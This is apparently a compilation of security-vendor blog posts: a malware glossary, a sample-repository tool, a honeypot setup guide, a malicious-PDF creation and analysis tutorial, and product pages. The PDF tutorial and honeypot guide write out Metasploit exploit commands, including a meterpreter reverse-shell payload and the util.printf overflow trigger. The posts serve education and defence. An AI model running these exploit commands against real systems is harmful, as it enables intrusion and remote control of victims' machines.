• Adware (Low threat): Means “Advertisement Software”. It will display ads to the user, or play advertisement in the background. Ex: Adware.Eorezo
• Rootkit (High threat): A rootkit modifies system memory (at user or kernel level) to hide itself and/or prevent its removal. Rootkits are usually designed to protect affiliate malware that are weaker. Ex: Rootkit ZeroAccess, Necurs
• Trojan (Medium threat): Ability to open a backdoor on a machine, and download (on demand) some other piece of malware in order to execute it.
• Dropper (Low threat): Is the entry point of an infection, it’s often encrypted and the smallest as possible to bypass antiviruses. Will download the real malware on internet (or extract from resources) and execute it (like a Trojan, yes).
• Password Stealer(High threat): Ability to steal passwords from various sources: Web (Social networks, Banks, …), FTP (to get control of web servers), Email account (to send malware or SPAM in your name). Those passwords are then sent to the attacker.
• Keylogger (High threat): Is able to save everything you type with your keyboard, take screenshots of your screen. They look for password (Like Password Stealer).
• Banker(High threat): Injects some code in your web browser when you are on a bank website (or about to buy something online), so that they get your bank credentials. Those credentials or credit cards are then sent back to the attacker. Ex: Zeus/Zbot.
• (Crypto)Ransomware (High threat): A Ransomware will either totally lock your computer, or for Crypto variants they will encrypt all your documents. In any case they ask a ransom to revert to original state. Ex: Reveton, CryptoLocker.
• Rogue Antivirus (Medium threat): They look like legit antivirus software, but they aren’t. Most of the time they display false infection, and want you to buy them to “remove” the infection. In reality there’s no infection, nor real scanner. And when you buy them, they simply do nothing.
• PUP (Low threat): That means “Potentially Unwanted Software”. They are legit software, but most of the time the user didn’t install them. They are bundled with other software, and user didn’t uncheck the “option” to install the affiliate software. Besides, most of PUPs are also Adware. Some PUPs are also using Rootkit tricks.
• Spambot (Medium threat): They are designed to send SPAMs, either directly from a compromised web server, or using victim messaging. They can also be web crawlers, searching the web for email addresses where to send SPAM.

It’s important to note that a malware can be of several types above. Actually most of them are, for example Zeus is a Banker, with Password Stealer capability, as well as Trojan to turn the machine into a zombie PC (part of a botnet).

• Botnet: It’s a group of zombie machines (bots), all linked to a C&C (see below). Botnets are often used to perform DDoS attacks, sending SPAM, bruteforce passwords (stolen from a database for example), …
• Bot (Zombie PC): A machine part of a botnet. It’s connected to the C&C, waiting for orders to execute.
• C&C (C2): A machine part of the botnet, dedicated to send commands to the others and get information and stolen data back from them. There can be one or several C&C, depending on the botnet architecture and complexity.
• DDoS: Attack by denial of service. To be efficient, must be coordinated between many different IP addresses. Often performed by a botnet. An attack will make the victim’s server/website unreachable, with possible economic consequences.
• SPAM: Illegitimate email, promoting a service, a product or anything.
• Bitcoin mining: Bitcoins are a virtual currency, that can be “mined”. We spend CPU resources (electricity in fact) to earn money.
• Exploit: A vulnerability into a software, operating system, or code in general. When exploitable, this can lead to privilege escalation (get admin rights) or remote code execution (starting a process without the consent of user). An exploit can be fixed by the software editor with a patch.
• 0-day exploit: It’s a vulnerability for which there is no patch available yet. This means everyone having the software is vulnerable.
• Exploit Kit: A kit of exploits. This is a platform server that will test your machine against many exploits, until one works. When an exploit works, the exploit kit will be able to deliver a Payload that will infect your machine. Most of the time, exploit kits are called through a malvertising.
• Payload: This is the “useful load”, the code for which all the infection chain was made for. It can be the malware itself, or its dropper.
• Malvertising: Means “malicious advertising”. It’s an ad that has been designed to call an exploit kit to infect your machine. In theory, major advertising platforms are validating ads before they are served, but smaller platforms don’t do it, or don’t do it right. Some are even created to serve malware under-the-hood.
• Compromised Server: When a server uses software with vulnerabilities, an attacker can take control of it through an exploit. When done, the compromised server can be used in a botnet, or directly to host malware, host phishing pages, send SPAM, …
• Phishing page: A webpage designed to look like a specific Bank login page, social network, anything where a user can put credentials. Those credentials will then be used for malicious actions, or sold.
• Persistence Item: This is an item that gives a malware the ability to be started at boot. It can be a registry key, a startup shortcut, a patched system file, a MBR infection, … (see below).
• Hooking: Setup a hook is an action performed by a rootkit. We can summarize that action by placing a filter on top of a system API. For example, NtOpenProcess is the API needed if we want to kill a process. If a rootkit hooks that API, it will be able to tell if the process termination is allowed or not, and protect its process.

Why are malware made?

They of course are made to make money. A lot of people are not understanding how malware writers make money.
It’s indeed a very lucrative activity, here’s a quick list of how they earn money:

• Selling malware/code: That’s the most obvious way to earn money. Malware writers sell their malware to other bad people, or sometimes they sell the source code.
• Displaying ads: That’s how adware make money. Each ad displayed/clicked generates money for them.
• Click fraud on ads: That’s another way to make money with ads. While the previous one is barely legal, this one is totally prohibited. Malware will simulate clicks on ads in the background, so the infected user will never know that his machine is clicking on ads. Ads clicked of course belong to the malware writer.
• Sending SPAM: A compromised server, or a bot, can be used to send SPAM to a list of email addresses. Spammers earn money every 1000 SPAMs sent.
• Selling Information: A banker, password stealer will bring back stolen passwords, and credit cards numbers. They are sold on black market at a rate that depends on which country they are from (Ex: 50$ for a US). Personal data can also be sold: Name – Email – Phone number, for SPAM campaigns.
• Providing easy malware installation: Rootkits can download/install/protect an affiliate malware (with compensation). Exploit kits are paid to install a particular payload.
• Selling Rogue Licenses: Rogue software owner will earn money by selling fake licenses.
• Asking Ransom: A Ransomware owner will be paid by infected people for giving them access back to machine/files. But most of the time they just take the money.
• Sell/Lease a Botnet: A Botnet can be useful for attacking a contestant, etc. Botnet owner is paid to give control of his botnet for 24/48/72 hours. The higher the number of bots, the higher the price.
• Bitcoin mining: Bitcoin mining is most of the time performed on infected machine, because malware owner will not pay power consumption. But he will get bitcoins into his own wallet.
• Selling/Blackmail DDoS attacks: Same as leasing a botnet, except that botnet owners can also blackmail a company himself by offering to NOT attacking them if they pay a ransom. Imagine a big commercial website being attacked during black Friday. They can’t, and sometimes they pay the ransom.
• Selling exploits/0-day: Some people are specialized in searching and selling 0-day exploits to bad guys. Depending on the targeted software, these 0-day exploits can be sold several thousands of dollars. They will then be integrated in exploit kits (above).

It all start with an infection

• Installed by the user itself: Fake P2P music/video file that is actually a EXE file. Fake cra.ck/key.gen for a software.
• Bundled software: User will download an installer for a software A, but will not uncheck affiliate programs installation. This will result with installation of software A, B, C. Unfortunately, B and C are malware.

Pdfcreator installing AVG-Toolbar

• Drive-by-download: This is the term used when speaking of malvertising, malicious web code, fake “required” plugins. It can be installed after you open an email attachement. They are installed sometimes without the user knowing it.

Fake plugin (grahamcluley.com)

Malware deployment

A malware will often be deployed in several steps:
The dropper is the file that is served first (the one you downloaded), that dropper is usually heavily encrypted, packed to bypass antiviruses. It will either unpack the payload from a resource, or download it directly from a server. Then the payload is executed.

Once executed, the payload will very often “install” itself to survive at reboot with a persistence item (see below). Additionally it can load several components to hide itself and/or harden its removal. Then it will perform the task for which is was designed.

(damballa.com)

Persistence Items

The persistence item of a malware is what makes it start at boot. Without it, malware would no longer exist after a machine is restarted.
So persistence item is the weakness of every malware infection.
Here’s a quick list of where a malware can hide its persistence item:

• Registry: RUN key, Services key, Browser Helper Object, … There are tons of different places in the registry to start a software at boot.
• Scheduled Task: We can schedule a program to start at boot.
• Startup folders: Placing a shortcut into one of them will start the program at boot.
• MBR/VBR infection (Bootkit): A bootkit will modify bootstrap/bootloader code of the Master Boot Record or Volume Boot Record to load its own driver before the operating system even loads.
• Patched system file: By modifying a legit system file (that is loaded at startup), the malware can place its own code and it will be executed at startup.
• Web browser extension: Nowadays, a computer will 99% of the time have a web browser opened during a work session. So an extension is a good choice to place malware code, plus it will have access to a lot of sensitive information.

Remaining Stealth

To remain hidden in the system, malware will often use several tips:

• Use randomly generated names to avoid detection by name.
• Hijack system names (1), Ex: svhost.exe (the real one is svchost.exe).
• Hijack system names (2), Ex: %temp%/explorer.exe (the real one is %windir%/explorer.exe). In task manager, we don’t see the full path.
• Perform process injection: Either by injecting code into existing process (like explorer.exe), or by creating a copy of existing process and by injecting code into it.
• Use hooking to hide or protect its process, persistence items.

Removal

To remove an infection, you can do it with several ways:

• Remove payload (99% of the time, a file).
• Remove persistence item(s).

Removing both is better, but either way would prevent the malware from loading.

Links

http://whatis.techtarget.com/definition/command-and-control-server-CC-server
http://www.tripwire.com/state-of-security/vulnerability-management/how-stolen-target-credit-cards-are-used-on-the-black-market/
https://blogs.mcafee.com/consumer/drive-by-download
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/

The post Malware, Virus, what are they? appeared first on Adlice Software.

Based on Jquery-upload-file plugin, modified to handle a MySQL database.

MRF (Malware Repository Framework) is able to uniquely identify a sample (with HASH) and keep essential information (size, original name) into a database for quick search. MRF is also able to query Virus Total for a report on uploaded samples, and display the score on the dashboard (plus store the information in the database). You can also send tasks and retrieve results from a Cuckoo machine (optional, needs a cuckoo machine).

Features

• Self-hosted solution (PHP/Mysql server needed).
• Can run on Synology NAS (with Web Station).
• REST API (submit, delete, update, get), with API Key.
• Authentication with modified UserCake.
• Users can only delete/modify their own samples (except Admin).
• VT results (unknown samples are uploaded).
• Cuckoo results (needs a properly configured and functional cuckoo machine).
• Samples ordered by descending date (limited to last 40 samples -by default-, with pagination).
• Search filters available (uploader, vendor, filename, hash, date, cuckoo results, vt score, uploader, comment, favorites, tags).
• Vendor name is picked from VT results in that order: Microsoft, Kaspersky, Bitdefender, Malwarebytes.
• Vendor name can be edited.
• Can add comments on samples.
• Can add samples to favorites.
• Can add tags to samples.
• Easy to customize, with only one config file to change.

Optional, webserver installation on Ubuntu

sudo apt-get update
sudo apt-get install lamp-server^
sudo apt-get install php5-curl
sudo apt-get install phpmyadmin
sudo ln -s /usr/share/phpmyadmin/ /var/www/html/phpmyadmin
sudo apt-get install git
sudo /etc/init.d/apache2 restart

Installation

• Download sources (link above).
• Unzip and extract on your web server.
• Make sure you have PHP with curl, and MySQL.
• Create a database (suggested name ‘mrf’).
• Edit /src/config.php
• Browse to the root of the project, it should launch the installer script. Run it.
• Remove /install folder.
• Create an account, this will be the admin account.
• Go to your profile and tweak what needs to be, It’s better to add an avatar base64 encoded.
• Go to admin config, configure name/url/email for the website.
• Go to admin pages, and change index.php to private, with Admin/New member visibility.

Filters

Filters are the search fields. Some require a specific syntax:

• Uploader: filters by uploader, nothing special.
• Date: filters by date, nothing special.
• Vendor: filters by vendor name, nothing special.
• Comment: filters by comment, nothing special.
• Hash: filters by hash, nothing special.
• Filename: filters by name, nothing special.
• FileSize: filters by size, can be: “<100" (less than 100 bytes), "100" (less than 100 bytes), ">100″ (more than 100 bytes).
• VTScore: filters by score, can be: “<10" (less than 10), "10" (less than 10), ">10″ (more than 10).
• Cuckoo: filters by cuckoo status, can be: “scanning” (being processed), “results” (result available).
• Favorite: filters by favorites, put anything to get only favorites samples.
• Tags: filters by tags, currently search works only on 1 tag.

A video tutorial can be found here:

API

To use the API, you need the API key from a user, you will find it in the account page.

To upload file(s), you can do a POST on:

http://localhost/api.php?action=uploadfiles

You need to add your token (API key) to the POST data:

token=edfe238e15c964e8a8218cf218e43dc1

You can add a comment to the post by adding POST data:

comment=my comment

You can add other metadatas to the sample(s) by adding POST data in JSON format:
The JSON array must contain the index of sample in the submission order.
If vtsubmit is true, the sample will be checked on VirusTotal
If cksubmit is true (and you have a cuckoo machine), the sample will be sent to sandbox.

files_data=[{"index":0, "vtsubmit":true, "cksubmit":false, "tags":"spam,malware"}]

If you find a bug, please let us know.
Please consider helping with a donation if you found this software useful.

The post MRF appeared first on Adlice Software.

Whether your are a security researcher or a sysadmin, you need a honeypot for various reasons: If you are a security researcher it’s because honeypots are very valuable source of malware and exploits, they also give hints about where the threats come from, and how big they are. If you are a sysadmin it’s because honeypots will be the first machines to be hit in your network, they can raise the red flag in case of an intrusion.

Definition

What is a honeypot? A honeypot is a machine configured to be (or at least, appear to be) vulnerable to exploits and/or password bruteforcing. Such machine needs to be fully exposed to the world, so that it can catch as many attacks as possible. Other than that, the machine needs some mechanisms to automatically alert administrator in case of an intrusion. That’s all.

MHN (Modern Honeypot Network)

I will present you an all-included solution called MHN (official page: https://github.com/threatstream/mhn), easy to deploy with few configuration.

MHN is made of at least 2 components: UI and a sensor, and it’s preferable for security to deploy those on 2 different servers.

Sensors are individual honeypots with a unique goal. They are based on other projects, deployed and linked to the UI very easily.

We will study the particular case of dionaea (link: http://www.edgis-security.org/honeypot/dionaea/ -official link appears to be down-), which handles many attacks like HTTP, HTTPS, MYSQL, FTP, SMB, …

MHN User Interface

To deploy user interface on the first machine, do the following (Ubuntu 14.04 tested):

$ cd /opt/
$ sudo apt-get install git -y
$ sudo git clone https://github.com/threatstream/mhn.git
$ cd mhn/
$ sudo ./install.sh

During install, some configuration will be requested:

===========================================================
MHN Configuration
===========================================================
Do you wish to run in Debug mode?: y/n n
Superuser email: YOUR_EMAIL@YOURSITE.COM
Superuser password: 
Server base url ["http://"]: 
Honeymap url ["http://:3000"]:
Mail server address ["localhost"]: 
Mail server port [25]: 
Use TLS for email?: y/n n
Use SSL for email?: y/n n
Mail server username [""]: 
Mail server password [""]: 
Mail default sender [""]: 
Path for log file ["mhn.log"]:

Once installed, the panel should be available on http://ip_of_your_ui_server.
Login with “Superuser” credentials.

Deploy dionaea Honeypot

Once logged into the UI, you will notice that everything is empty.
We first need the deploy a sensor and connect it back to MHN.

To do so, navigate to “Deploy”, and select “Dionaea Ubuntu” in the list.
This will give you a deploy command like this (don’t use this one!):

wget "http:///api/script/?text=true&script_id=7" -O deploy.sh && sudo bash deploy.sh http:// 

Copy and paste that command into a terminal on your sensor machine (remember, it’s better to be a separate machine). Execute it and watch. Once installed, you should see a new sensor in the list:

You’re all set! If your sensor IP is well known, you should start to get connexions from bots.
They are logged as ‘attacks’, but they are most of the time only port scan.

Test Honeypot

We can make sure everything is well configured with a manual test with little help of metasploit.
If you have a machine with metasploit installed (not covered here), you can execute the following command:

msfconsole -x "use exploit/windows/smb/ms10_061_spoolss; set PNAME XPSPrinter; set RHOST ; set LHOST ; set LPORT 4444; exploit; exit"

It should be able to send a payload on the sensor machine:
 

 
And the sensor should be able to log the activity:
 

 
Also, the sensor should have captured the payload:
 

 
That’s it, now you should be able to catch in-the-wild threats.
You can take a look at other built-in sensors, they worth it!

After a few days:

After a few days, this is what it looks like:
 

 
The map shows real time attacks (no history is kept), and is quite interesting:
 

Links

– https://github.com/threatstream/mhn
– http://www.edgis-security.org/honeypot/dionaea/
– http://www.metasploit.com/

The post Catch malware with your own Honeypot appeared first on Adlice Software.

Infected PDFs have always been a privileged way to infect users because this document format is very common and used by almost everyone. Moreover, it exists many ways to exploit Acrobat Reader vulnerabilities and it’s very stealth and elegant way to launch a malware.

In this article, I will show you how easy it is to craft a malicious PDF with custom shellcode, and trigger a vulnerability to execute a payload. We will also analyse the malicious PDF to learn how the payload is stored, and how to extract it.

This article is for research purpose only, don’t do bad things!

PDF Format

PDF is object oriented format, defined by Adobe. This format describes a document organization, and preserves dependencies needed for the document (fonts, images, …). These objects are stored within the document as streams and most of the time encoded or compressed. Below is the overview of a classic PDF document. For more information, please read Adobe’s specifications.
 

Infected PDF creation

We will create a fake PDF with metasploit, containing an exploit attempt, as well as a custom payload (code to execute). The exploit is targeting a specific version of Adobe Reader, so we will need to make some archaeology and find an ancient Reader version (thanks to http://www.oldapps.com/) to install on the target machine.

So, first, let’s make this PDF. We will make a infected PDF that just opens calculator (calc.exe) on the machine, just for demonstration. Open a metasploit console (installation of metasploit is not covered in this article) and type:

use exploit/windows/fileformat/adobe_utilprintf
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit

This should look like this:

Copy the file that has just been created (here /home/osboxes/.msf4/local/malicious.pdf) on a shared drive. You will need to feed your target machine with it.

Infected PDF execution

On the target machine, download and install a vulnerable Adobe Reader version (metasploit tells us it should be less than 8.1.2). I choose to install a 8.1.1 version.

Once installed, execute the malicious.pdf file. You should see a calculator being spawned from the Adobe Reader process. That’s the exploit.

I’ve done another PDF but changed the payload slightly, just for fun:

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.29
set LPORT 4455

Here’s the result. Adobe Reader now has a backdoor (reverse shell) listening for commands.

Infected PDF analysis

Played enough! Let’s see what’s inside that malicious PDF, and let’s try to extract the malicious payload (we’re still with the calc.exe PDF).

First, we will need a tool called PDF Stream Dumper, so download it. Load the malicious PDF with it, and take some time to familiarize yourself with the tool.

We can start by checking if some exploit is detected by the tool using the “Exploit Scan” menu:

Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 6

Indeed, there’s an exploit hidden in stream 6 (the one in blue on the capture).

But let’s start by the beginning: when searching for exploits in a PDF, we most of the time encounter heap spray created by a Javascript code. That heap spray is used to push the payload on the heap, ready to be executed once the vulnerability has triggered.

If you open Stream 1, you can see:

/Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R

That we can translate to OpenAction on stream 5. Let’s move to stream 5:

/Type/Action/S/JavaScript/JS 6 0 R

Which says to execute Javascript located in stream 6. This stream shows plain Javascript, it’s time to open the “Javascript_UI” menu. We immediately recognize a big string hex encoded, and pushed into a variable for heap spray. This is our payload:

Fortunately, we have tools to manipulate it, and understand what it does. Select the payload (the part between quotes), and open “Shellcode_analysis” menu. Then choose “scDbg – LibEmu Emulation”. You will get a new window will the shellcode decoded into bytes (you can even save it to file):

LibEmu is a library able to simulate a processor, it gives information about what the assembly code is trying to do. Just hit the “Launch” button and you will understand:

Here it is, we can clearly see the shellcode will just opens a calc.exe window and exits.
Let’s redo the same analysis for the other malicious PDF (reverse shell):

Uh, self explaining right? Shellcode is loading the library needed to manipulate sockets (ws2_32.dll), and tries to connect back to C&C.

I haven’t told about the exploit itself, it’s located at the end of the javascript code (like stated by Exploit search, “util.printf – found in stream: 6”). It’s exploiting a buffer overflow on printf function to execute arbitrary code (here, our heap-sprayed shellcode).

util.printf("%45000.45000f", 0);

Links

– http://www.sans.org/reading-room/whitepapers/malicious/owned-malicious-pdf-analysis-33443
– http://www.oldapps.com/adobe_reader.php
– http://contagiodump.blogspot.fr/2010/08/malicious-documents-archive-for.html
– http://contagiodump.blogspot.fr/2013/03/16800-clean-and-11960-malicious-files.html
– http://eternal-todo.com/blog/cve-2011-2462-exploit-analysis-peepdf
– http://blog.9bplus.com/analyzing-cve-2011-2462/
– https://www.fireeye.com/blog/threat-research/2012/07/analysis-of-a-different-pdf-malware.html
– http://resources.infosecinstitute.com/analyzing-malicious-pdf/

The post Infected PDF: Extract the payload appeared first on Adlice Software.

Malwarebytes Anti-Malware targets adware, viruses, rootkits, etc… The program comes in an installer, you can easily uninstall it. It’s compatible with Windows XP, Vista, 7, 8, 8.1, 10. Both 32/64 bits. Changelog can be read here.

Malwarebytes Premium comes with real time protection.
Go Premium with Malwarebytes, the Leader in Malware Removal.
 

 

The post Malwarebytes appeared first on Adlice Software.

Why buy Premium?

• Privileged support: Easy and Fast support for you, don’t hesitate to bother us.
• No nag window: Go faster without the nag window.
• To help us maintaining the software efficient for everyone.

Features:

• Open PE from file, and read disk image.
• Open PE from process, and read memory or disk image.
• Open file from command line.
• Drag and drop support.
• Explorer context menu integration.
• Process general information (pid, parent, …)
• File general information (attributes, size, …)
• Process module general information (address, size, …)
• A bunch of hashes (MD5, SHA1, SHA256, …)
• Process memory pages, with ability to dump.
• Injected pages detection, non-readable pages detection.
• Ability to dump injected pages to file.
• Hex code, with ability to search (hex values, or string ANSI/UNICODE).
• Assembly code, with ability to navigate.
• PE Headers (MZ, PE, Optional, …)
• RunPE detection, shows which header fields are modified.
• Checksum validation.
• PE Sections, with ability to watch hex code and dump to file.
• PE Imports, with ability to watch APIs assembly code (memory only).
• PE Exports, with ability to watch APIs assembly code.
• Hooks detection in imports/exports (table and inline hooks).
• PE Resources. Able to parse all well known types and display them accordingly (strings, version information, icons, …)
• Ability to scan resources on VirusTotal.
• Executable files detection in resources.
• Ability to watch hex code of resources.
• Ability to dump resources to file.
• PDB path detection.
• Strings scanner, with classification (Registry, files, …)
• Ability to dump all strings (by category or not) to file.
• Digital Signature parsing (embedded only).
• Yara Editor, create and test your own yara signatures.
• Bright or dark theme (Premium).
• Samples Comparer (Premium).

User guide

• Start the tool.
• Drag a file on the interface, or load the process list.
• If you choose a file, there you go.
• If you choose a process, you can inspect a different module by selecting a new one in the modules list.
• If you choose a process, you can toggle disk/image and switch from process memory to disk image and vice-versa.

The post Adlice PEViewer appeared first on Adlice Software.

 
Based on powerful generic detections (heuristics), and on more classic anti-malware analysis (signature finding), RogueKiller is one of the best malware removal software. It is able to find threats other anti-malware can’t find because of the very aggressive and deep scanner (with Anti-Rootkit module).

RogueKiller is maintained by a small team. We also react very quickly to integrate new detections and bug fixes.
RogueKiller is compatible with Windows XP, Vista, 7, 8, 8.1, 10. Fully compatible 32/64 bits.

Why buy Premium?

• Privileged support: Easy and Fast support for you, don’t hesitate to bother us.
• Automation: With the command line parameters.
• Customization: Tweak the settings and adapt scan to your needs.
• To help us maintaining the software efficient for everyone.

Documentation/FAQ

• General Documentation.

Roguekiller Anti-Malware Free Download

If you are not sure which version or mirror to use, please follow these rules:

– If you are outside of France, please use the Fosshub or Dropbox mirrors.

– If you are a Premium user, it’s recommended (to get automatic updates) to use a version with installer.

– “Portable” means no installation is required.

The post RogueKiller Anti-malware appeared first on Adlice Software.